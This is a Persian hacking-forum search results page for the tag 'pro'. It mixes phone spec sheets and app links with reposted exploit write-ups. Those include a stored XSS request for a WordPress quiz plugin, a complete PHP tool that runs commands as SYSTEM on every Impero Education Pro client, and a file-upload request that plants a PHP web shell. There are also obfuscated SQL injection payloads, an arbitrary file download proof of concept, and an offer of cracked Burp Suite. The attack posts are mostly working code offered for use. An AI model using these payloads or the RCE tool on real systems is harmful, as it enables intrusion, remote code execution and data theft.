iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'pro'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

58 نتیجه پیدا شد

  1. # Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting # Google Dork: inurl:"/wp-content/plugins/jibu-pro" # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip # Version: 1.7 # Tested on: Kali Linux # CVE: N/A # Description: Jinu Pro is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Login as a user who have access to Jibu Pro plugin. # 2) Jibu-Pro --> Create Quiz. # 3) At the Quiz Name type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number]) # 4) Click Create New Questions, fill the fields and click Save. # 5) Copy the Shortcode [Test Number] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 512 name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save
  2. اگر اقدام به نصب آفیس 2013 کرده باشید حتماً متوجه شده‌اید که اگر بر روی فایل یا پوشه‌ای راست‌کلیک کنید گزینه‌‌ای به نام SkyDrive Pro به این منو اضافه شده است. از این گزینه می‌توان برای به اشتراک‌گذاری فایل‌ها با یک سرور Microsoft SharePoint استفاده کرد. اما در عمل تقریباً این گزینه یک گزینه‌ی بلا استفاده است و کمتر کاربری از آن استفاده می‌کند. با استفاده از این ترفند می‌توانید SkyDrive Pro را از منوی راست‌کلیک ویندوز حذف کنید. این کار به دو روش قابل انجام است. کلیدهای ترکیبی Win+R را فشار دهید. در پنجره‌ی Run عبارت regedit را وارد نموده و Enter بزنید. حال در پنجره‌ی Registry Editor به مسیر زیر بروید: HKEY_CLASSES_ROOT\AllFilesystemObjects\shell حال بر روی کلید SPFS.ContextMenu راست‌کلیک کرده و Delete و سپس Yes را انتخاب نمایید. تغییر بلافاصله اعمال خواهد شد.
  3. mohammad_ghazei

    Hacking

    /* If you're unsure what Impero is, it's essentially a corporate/educational RAT. Vendor site: https://www.imperosoftware.co.uk/ They recently were in the news about how they implemented "anti-radicalisation" shit or something. They had a booth at BETT back in January. They gave out donuts. Those were nice. Unfortunately, when I asked about their security, nobody answered me. Some reversing later, looks like Impero is completely pwned amirite. The proprietary Impero protocol on the wire is encrypted. With AES-128 CBC. And a hardcoded key and iv that are both derived from sha512(Imp3ro). ISO10126 padding is used. After connection, a client must authenticate. This is done by sending "-1|AUTHENTICATE\x02PASSWORD". Not even joking here. "PASSWORD" is a seperate string though, so it might be different for some special clients maybe. No idea. Then, we have full range to do whatever we want. My PoC also does negotiatiation, but I'm not sure if that's needed. We can get a list of clients with the "SENDCLIENTS" command, then send all the IDs to "SENDCOMMANDMSG" (run CLI command as SYSTEM), or OPENFILE (run visibly an EXE under whatever user, including SYSTEM), or other protocol commands, etc. There's an OSX version, but I haven't properly looked into that. Run my PoC with the right args and it pops calc on every Windows client as SYSTEM. It also runs "whoami > c:\lol.txt", also as SYSTEM. This second one gets logged serverside, but the server logs it as "unknown" as it doesn't know what client did it. Basically, if you use Impero, please don't. Oh yeah -- free speech for the win... internet censorship is <insert some expletives here>, and so are any and all RATs. - slipstream / RoL^LHQ - @TheWack0lian PoC code follows. In PHP because lol. PoC works on at least 5.x (latest). */ <?php // Impero Education Pro SYSTEM-RCE PoC // by slipstream/RoL^LHQ // greets to everyone in lizardhq! :) function PadString($str) { $size = 16; $pad = $size - (strlen($str) % $size); $padstr = ''; for ($i = 1; $i < $pad; $i++) $padstr .= chr(mt_rand(0,255)); return $str.$padstr.chr($pad); } function UnPadString($str) { return substr($str,0,-(ord(substr($str,-1)))); } function CryptString($str) { $hash = hash('sha512','Imp3ro',true); $key = substr($hash,0,0x20); $iv = substr($hash,0x20,0x10); $crypted = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$key,PadString($str),'cbc',$iv); return $crypted; } function DecryptString($str) { $hash = hash('sha512','Imp3ro',true); $key = substr($hash,0,0x20); $iv = substr($hash,0x20,0x10); return UnPadString(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,$key,$str,'cbc',$iv)); } function SendNetwork($h,$str) { global $socketid; $crypted = CryptString($socketid."|".$str); socket_write($h,strlen($crypted).'|'.$crypted); return; } function RecvNetwork($h) { $len = ''; $chr = ''; do { $len .= $chr; $chr = socket_read($h,1); } while ($chr != '|'); $len = (int)($len); if ($len < 1) die("Something's wrong. Length isn't an int."); socket_set_block($h); $crypted = socket_read($h,$len); $dec = DecryptString($crypted); global $socketid; $dec = explode('|',$dec,2); if ($socketid == -1) $socketid = $dec[0]; return $dec[1]; } function Connect($host,$port = 30015) { echo "Connecting..."; $h = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); socket_set_block($h); if ((!$h) || (!socket_connect($h,$host,$port))) { echo "failed.\n"; return false; } echo "done!\nAuthenticating..."; // authenticate SendNetwork($h,"AUTHENTICATE\x02PASSWORD"); echo "done!\nWaiting for response..."; // we should get "AUTH:OK" back $data = RecvNetwork($h); if ($data != "AUTH:OK") { echo "authentication failed.\n"; return false; } echo "authentication succeeded!\nNegotiating..."; SendNetwork($h,"PING1\x02IE11WIN7\x03\x035003\x019f579e0f20cb18c8bc1ee4f2dc5d9aeb\x01c0d3fd41a05add5e6d7c8b64924bef86\x018dc3a6ceec8a51e1fd2e7e688db44417\x01d1554e349fc677e6011309683ac1b85b\x012b94f70093e484b8fc7f62a4670377ea"); // we get sent 4 loads of packets. discard all. for ($i = 0; $i < 4; $i++) { RecvNetwork($h); usleep(500000); } //SendNetwork($h,"-1|ANNOUNCE\x01600\x012\x01-1\x02IE11WIN7\x03IEUser\x03\x031\x03\x030\x031\x036\x0308:00:27:85:C5:CD,08:00:27:D0:C2:E1\x0310.0.2.15,192.168.56.101\x035003\x032015-06-11 12:17:19\x0310.0.2.255,192.168.56.255\x03None,Everyone,Users,INTERACTIVE,CONSOLE LOGON,Authenticated Users,This Organization,Local account,LOCAL,NTLM Authentication\x035003\x032.0.50727.5485\x03IE11WIN7\x03NODOMAIN"); echo "done!\n"; return $h; } function GetAllClients($h) { $pline = "SENDCLIENTS\x01604\x011\x010\x02"; echo "Getting all clients..."; SendNetwork($h,$pline); $data = RecvNetwork($h); // grab the base64 blob $data = array_pop(explode("\x02",$data)); // unbase64 and uncompress $data = gzdecode(base64_decode($data)); $ret = array(); foreach (explode("\r\n",$data) as $line) { // we only care about clientIDs $ret[] = array_shift(explode("\x03",$line)); } echo "done!\n"; return $ret; } function RunCmd($h,$ids,$cmdline) { global $socketid; $ids = implode(',',$ids); $pline = "ECHO\x01\x01".$ids."\x01SENDCOMMANDMSG\x010\x02\x01\x01".$cmdline; echo "Sending evil RunCMD data..."; SendNetwork($h,$pline); echo "done!\n"; // if this was a real proper negoiated client we'd get something back // however, we aren't, and we're masquerading as client #0; thus, we don't. // this does show up in logs, with the executed command. however, the server doesn't know who ran it, so it shows up as "unknown". :) } function RunExeAsSystem($h,$ids,$exe) { global $socketid; $ids = implode(',',$ids); $pline = "ECHO\x01\x01".$ids."\x01OPENFILE\x010\x02".$exe."\x08\x08NT AUTHORITY\SYSTEM\x08Password"; echo "Sending evil RunEXE data..."; SendNetwork($h,$pline); echo "done!\n"; // we don't get a response from this one } function FindImperoServer($if,$addr) { $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP); socket_set_option($sock, SOL_SOCKET, SO_BROADCAST, 1); socket_set_option($sock,SOL_SOCKET,IP_MULTICAST_IF,$if); $str = "ARE_YOU_IMPERO_SERVER"; socket_sendto($sock, $str, strlen($str), MSG_DONTROUTE, $addr, 30016); socket_set_option($sock,SOL_SOCKET,SO_RCVTIMEO,array("sec"=>6,"usec"=>0)); $r = socket_recvfrom($sock, $buf, 18, 0, $remote_ip, $remote_port); if ($buf == "I_AM_IMPERO_SERVER") return $remote_ip; return false; } $socketid = -1; echo "[*] Impero Education Pro SYSTEM-RCE PoC by slipstream/RoL^LHQ\n"; if ($argc < 2) { echo "[-] Usage: ".$argv[0]." <serverIPs space-delimited>\n"; echo "[*] If you pass \"detect <if> <broadcastmask>\" (without quotes) as serverIP then we will try to find an impero server, using interface and broadcast mask given.\n"; echo "[*] Example of this: ".$argv[0]." detect vboxnet0 192.168.56.255\n"; echo "[*] This PoC will pop a calc and run whoami > C:\lol.txt as SYSTEM on *every connected client*!\n"; die(); } array_shift($argv); foreach ($argv as $key=>$arg) { $detected = false; if ($arg == "detect") { if ($key + 2 >= count($argv)) continue; echo "[*] Finding Impero server...\n"; $arg = FindImperoServer($argv[$key+1],$argv[$key+2]); if ($arg == false) die("[-] Cannot find Impero server\n"); echo "[+] Found Impero server at ".$arg."\n"; $detected = true; } $h = Connect($arg); if ($h === false) continue; $clients = GetAllClients($h); RunExeAsSystem($h,$clients,"calc"); RunCmd($h,$clients,"whoami > C:\lol.txt"); echo "\n"; if ($detected) die(); }
  4. برنامه BrupeSuite رو باید حتما بشناسید . از معروف ترین ابزار های کاربردی در تست نفوذ میباشد که در جدول Top10 Security Tools کالی لینوکس قرار دارد برنامه بسیار کاربردی میباشد و میتواند در پیدا کردن باگ و اکسپلویتینگ بسیار مفید باشد . قیمت این برنامه ۲۹۹ دلار در سال میباشد که ما به رایگان در اختیار شما قرار میدهیم برای اجرا در ویندوز فایل .bat رو اجرا کنید و همه فایل ها را در یک دایرکتوری قرار دهید از قابلیت های این برنامه : P.r.o.x.y Repeater Scanner Intruder Spider(Crawler و موارد دیگر برای اجرا در لینوکس میتوانید از دستور زیر استفاده کنید لینک دانلود : با تشکر ReZa CLONER
  5. Moeein Seven

    Soft-Android

    Photo Lab PRO Picture Editor اپلیکیشن اندرویدی که با امکانات کامل شامل 640 فریم ، افکت و ف/ی/ل/ت/ر جهت ایجاد طرح های جالب و مفرح در عکس ها میباشد. به کمک اپلیکیشن حرفه ای Photo Lab PRO Picture Editor به راحتی قادر خواهید بود که مونتاژ های جالب، نمادهای تصویری بانمک، کاریکاتور های کارتونی، کارت ها و wallpaper جدید خلق نمایید. اپلیکیشن Photo Lab هیچ اثر نامطلوب یا سایه داری در چاپ تصاویر جدید ایجاد نمیکند. ویژگی که بیشترین لذت را از آن خواهید برد، امکان کاریکاتوری کردن عکس هاست که تنها با یک کلیک، قابلیت تغییر چهره شما را به کاریکاتور های خنده دار و جالب دارد! جهت دانلود این نرم افزار برای سیستم عامل اندروید برروی لینک زیر کلیک کنید Photo Lab PRO Picture Editor: effects, blur & art - Apps on Google Play
  6. # Exploit Title: Unauthenticated Arbitrary File Upload # Date: November 12, 2017 # Exploit Author: Colette Chamberland # Author contact: colette@defiant.com # Author homepage: https://defiant.com # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446 # Version: < 3.2.0 # Tested on: Wordpress 4.x # CVE : CVE-2017-16949 Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. PoC: POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1 Host:server User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_GET['e'].' 2>&1'); ?> -----------------------------7230359611602921801124357792--
  7. Moeein Seven

    Hacking

    # # # # # # Exploit Title: Joomla! Component Guru Pro 'promocode'- SQL Injection # Dork: N/A # Date: 17.12.2017 # Vendor Homepage: https://www.ijoomla.com/ # Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189 # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/guruBuy?promocode=[SQL] # # '%20/*!50000Procedure*/%20/*!50000Analyse*/%20(extractvalue(0%2c/*!50000concat*/(0x27%2c0x496873616e2053656e63616e%2c0x3a%2c@@version))%2c0)%2d%2d%200x2d # # # # # #
  8. mohammad_ghazei

    Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  9. mohammad_ghazei

    Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  10. محمد توکلی

    Mobile-HUAWEI

    مشخصات عمومی هواوی Mate 9 Pro شبکه 2GGSM 850 / 900 / 1800 / 1900 - سیم کارت 1 & سیم کارت 2 (dual-سیم کارت model فقط) شبکه 3GHSDPA 800 / 850 / 900 / 1700(AWS) / 1900 / 2100 شبکه 4GLTE band 1(2100), 2(1900), 3(1800), 4(1700/2100), 5(850), 7(2600), 8(900), 9(1800), 12(700), 17(700), 18(800), 19(800), 20(800), 26(850), 28(700), 29(700), 38(2600), 39(1900), 40(2300), 41(2500) سیم کارتتک سیم کارت (نانو سیم کارت) ,دو سیم کارته (نانو سیم کارت, Dual Standby) تاریخ معرفی2016, نوامبر وضعیتموجود در بازار. عرضه شده در ژانویه 2017 بدنه هواوی Mate 9 Pro ابعاد152x75x7.5 میلیمتر (5.98x2.95x0.30 اینچ) وزن169 گرم (5.96 oz) صفحه نمایش هواوی Mate 9 Pro نوعصفحه نمایش لمسی خازنی AMOLED, با 16 میلیون رنگ اندازه5.5 اینچ (نسبت سطح صفحه نمایش به بدنه در حدود 73.2 درصد) وضوح1440x2560 پیکسل (در حدود 534 پیکسل در هر اینچ) قابلیت چند لمسی فن آوری محافظCorning Gorilla Glass 3 - EMUI 5.0 زنگ هواوی Mate 9 Pro انواع زنگویبریشن; MP3, WAV زنگ بلندگودارد, اسپیکرهای استریو 3.5mm jack - Active noise cancellation with dedicated mic حافظه هواوی Mate 9 Pro کارت حافظه داخل دستگاه64 گیگابایت, 4 گیگابایت RAM ,128 گیگابایت, 6 گیگابایت RAM امکانات ارتباطی هواوی Mate 9 Pro GPRS EDGE سرعتHSPA 42.2/5.76 Mbps, LTE-A (3CA) Cat12 600/150 Mbps شبکه بی سیمWi-Fi 802.11 a/b/g/n/ac, dual-band, DLNA, WiFi Direct, hotspot بلوتوثv4.2, A2DP, EDR, LE NFC مادون قرمز USBv2.0, نوع-C 1.0 reversible connector دوربین هواوی Mate 9 Pro اصلیدو تا 20 مگاپیکسل +12 مگاپیکسل, f/2.2, OIS, 2x zoom, Leica optics, phase detection & فوکوس اوتوماتیک لیزری, dual-LED (dual tone) فلش دیگر امکاناتثبت اطلاعات مکانی (geo-tagging), فوکوس لمسی (touch focus), تشخیص صورت و لبخند, پانوراما, تصویربرداری HDR فیلم برداریفیلم برداری 2160p با سرعت 30 فریم در ثانیه ثانویه8 مگاپیکسل, f/1.9, 1080p دیگر امکانات هواوی Mate 9 Pro OSسیستم عامل اندروید, نسخه 7.0 (Nougat) ChipsetHisilicon Kirin 960 CPUOcta-core (4x2.4 GHz Cortex-A73 & 4x1.8 GHz Cortex-A53) GPUMali-G71 M‍P8 موقعیت یاب (GPS)دارد, with A-GPS, GLONASS, BDS, GALILEO رادیو رنگ بندیطلایی, خاکستری حسگرهاFingerprint (front-mounted), شتاب سنج, ژیروسکوپ, حسگر مجاورتی, فشارسنج, قطب نما پیغام رسانیSMS (threaded view), MMS, Email, Push Email مرورگر وبHTML5 جاوا - Fast battery charging - DivX/XviD/MP4/H.265/WMV player - MP3/eAAC+/WMA/WAV/Flac player - Document editor
  11. محمد توکلی

    Mobile-HUAWEI

    مشخصات عمومی هواوی Honor 8 Pro شبکه 2G GSM 850 / 900 / 1800 / 1900 - سیم کارت 1 & سیم کارت 2 شبکه 3G HSDPA 850 / 900 / 1900 / 2100 شبکه 4G LTE سیم کارت دو سیم کارته (نانو سیم کارت, Dual Standby) تاریخ معرفی 2017, فوریه وضعیت موجود در بازار. عرضه شده در مارس 2017 بدنه هواوی Honor 8 Pro ابعاد 157x77.5x7 میلیمتر (6.18x3.05x0.28 اینچ) وزن 184 گرم (6.49 oz) صفحه نمایش هواوی Honor 8 Pro نوع صفحه نمایش لمسی خازنی LTPS IPS LCD, با 16 میلیون رنگ اندازه 5.7 اینچ (نسبت سطح صفحه نمایش به بدنه در حدود 73.6 درصد) وضوح 1440x2560 پیکسل (در حدود 515 پیکسل در هر اینچ) قابلیت چند لمسی - Emotion UI 5 زنگ هواوی Honor 8 Pro انواع زنگ ویبریشن; MP3, WAV زنگ بلندگو 3.5mm jack - DTS sound enhancement - Active noise cancellation with dedicated mic حافظه هواوی Honor 8 Pro کارت حافظه microSD, تا 256 گیگابایت (uses سیم کارت 2 slot) داخل دستگاه 64 گیگابایت, 4 گیگابایت RAM ,128 گیگابایت, 6 گیگابایت RAM امکانات ارتباطی هواوی Honor 8 Pro GPRS EDGE سرعت HSPA 42.2/5.76 Mbps, LTE-A (2CA) Cat6 300/50 Mbps شبکه بی سیم Wi-Fi 802.11 a/b/g/n/ac, dual-band, DLNA, WiFi Direct, hotspot بلوتوث v4.2, A2DP, LE NFC مادون قرمز USB v2.0, نوع-C 1.0 reversible connector دوربین هواوی Honor 8 Pro اصلی دو تا 12 مگاپیکسل, f/2.2, phase detection, فوکوس اوتوماتیک لیزری, dual-LED (dual tone) فلش دیگر امکانات ثبت اطلاعات مکانی (geo-tagging), فوکوس لمسی (touch focus), تشخیص چهره, تصویربرداری HDR, پانوراما فیلم برداری فیلم برداری 2160p با سرعت 30 فریم در ثانیه, فیلم برداری 1080p با سرعت 60 فریم در ثانیه ثانویه 8 مگاپیکسل, f/2.0, 1080p دیگر امکانات هواوی Honor 8 Pro OS سیستم عامل اندروید, نسخه 7.0 (Nougat) Chipset HiSilicon Kirin 960 CPU Octa-core (4x2.4 GHz Cortex-A73 & 4x1.8 GHz Cortex-A53) GPU Mali-G71 M‍P8 موقعیت یاب (GPS) دارد, with A-GPS, GLONASS, BDS رادیو رنگ بندی طلایی, آبی حسگرها Fingerprint (rear-mounted), شتاب سنج, ژیروسکوپ, حسگر مجاورتی, قطب نما پیغام رسانی SMS(threaded view), MMS, Email, Push Mail, IM مرورگر وب HTML5 جاوا - MP4/H.264 player - MP3/eAAC+/WAV/Flac player - Document viewer - Photo/video editor باطری هواوی Honor 8 Pro Non-removable Li-Po 4000 mAh battery سایر موارد هواوی
  12. mohammad_ghazei

    Soft-Apple

    بازی AA Slots HD Pro AA Slots HD Pro on the App Store
  13. mohammad_ghazei

    Soft-Apple

    بازی AA Slots Pro AA Slots Pro on the App Store
  14. mohammad_ghazei

    Soft-Apple

    بازی AAA Aaron Astronaut At Big Bang Space Bingo PRO AAA Aaron Astronaut At Big Bang Space Bingo PRO on the App Store
  15. mohammad_ghazei

    Soft-Apple

    بازی AAA 204Eight Blocks Pro - Fun brain teasers and math strategy puzzle AAA 204Eight Blocks Pro - Fun brain teasers and math strategy puzzle on the App Store
  16. mohammad_ghazei

    Soft-Apple

    بازی AA Circle Color - Pro Edition AA Circle Color - Pro Edition on the App Store
  17. mohammad_ghazei

    Soft-Apple

    بازی Jewel Breaker Pro AA Jewel Breaker Pro on the App Store
  18. محمد توکلی

    Mobile-SAMSUNG

    مشخصات عمومی سامسونگ Galaxy Pro B7510 شبکه 2G GSM 850 / 900 / 1800 / 1900 شبکه 3G HSDPA 900 / 2100 تاریخ معرفی 2011, مارس وضعیت موجود در بازار. عرضه شده در آوریل 2011 اندازه سامسونگ Galaxy Pro B7510 ابعاد 108.6x66.7x10.7 میلیمتر وزن 103.4 گرم صفحه نمایش سامسونگ Galaxy Pro B7510 نوع صفحه نمایش لمسی خازنی TFT, با ‬256 هزار رنگ اندازه 320x240 پیکسل, 2.8 اینچ - QWERTY keyboard - Accelerometer sensor for UI auto-rotate - Proximity sensor for auto turn-off زنگ سامسونگ Galaxy Pro B7510 انواع زنگ ویبریشن; MP3 زنگ بلندگو 3.5mm jack حافظه سامسونگ Galaxy Pro B7510 دفتر تلفن تعداد نامحدود و همراه همه جزئیات, حافظه تصویری حافظه تماس ها نامحدود داخل دستگاه 512 MB حافظه داخلی کارت حافظه microSD, تا 32 گیگابایت, به همراه کارت 2 گیگابایتی امکانات ارتباطی سامسونگ Galaxy Pro B7510 GPRS EDGE 3G HSDPA, 7.2 Mbps شبکه بی سیم Wi-Fi 802.11 b/g/n, Wi-Fi hotspot بلوتوث دارد, v2.1 with A2DP مادون قرمز USB دارد, microUSB v2.0 دوربین سامسونگ Galaxy Pro B7510 اصلی 3.15 مگاپیکسل, 2048x1536 پیکسل دیگر امکانات Smile shutter فیلم برداری دارد, QVGAبا سرعت 30 فریم در ثانیه ثانویه دیگر امکانات سامسونگ Galaxy Pro B7510 OS سیستم عامل اندروید, نسخه 2.2 (Froyo) CPU 800 MHz processor پیغام رسانی SMS(threaded view), MMS, Email, Push Mail, IM, RSS مرورگر وب HTML رادیو رادیو FM استریو با امکان دریافت پیامهای متنی (RDS) بازی ها دارد + قابل دانلود رنگ بندی مشكی, سفيد موقعیت یاب (GPS) دارد, with A-GPS support جاوا دارد, via جاوا MIDP emulator - SNS integration - Digital compass - DivX/Xvid/MP4/WMV/H.264 player - MP3/WAV/eAAC+ player - Organizer - Image/video editor - ThinkFree document viewer/editor - Google Search, Maps, Gmail, YouTube, Calendar, Google Talk, Picasa integration - Adobe Flash 10.1 support - Voice memo/dial - Predictive text input باطری سامسونگ Galaxy Pro B7510 Standard battery, Li-Ion 1350 mAh زمان آماده باش تا 610 ساعت (2G) / تا 430 ساعت (3G) زمان صحبت تا 11 ساعت (2G) / تا 6 ساعت و 10 دقیقه (3G)
  19. Anonyali

    Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  20. Anonyali

    Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  21. mohammad_ghazei

    Soft-Apple

    بازی AA Tap - Pro Edition AA Tap - Pro Edition on the App Store
  22. mohammad_ghazei

    Soft-Apple

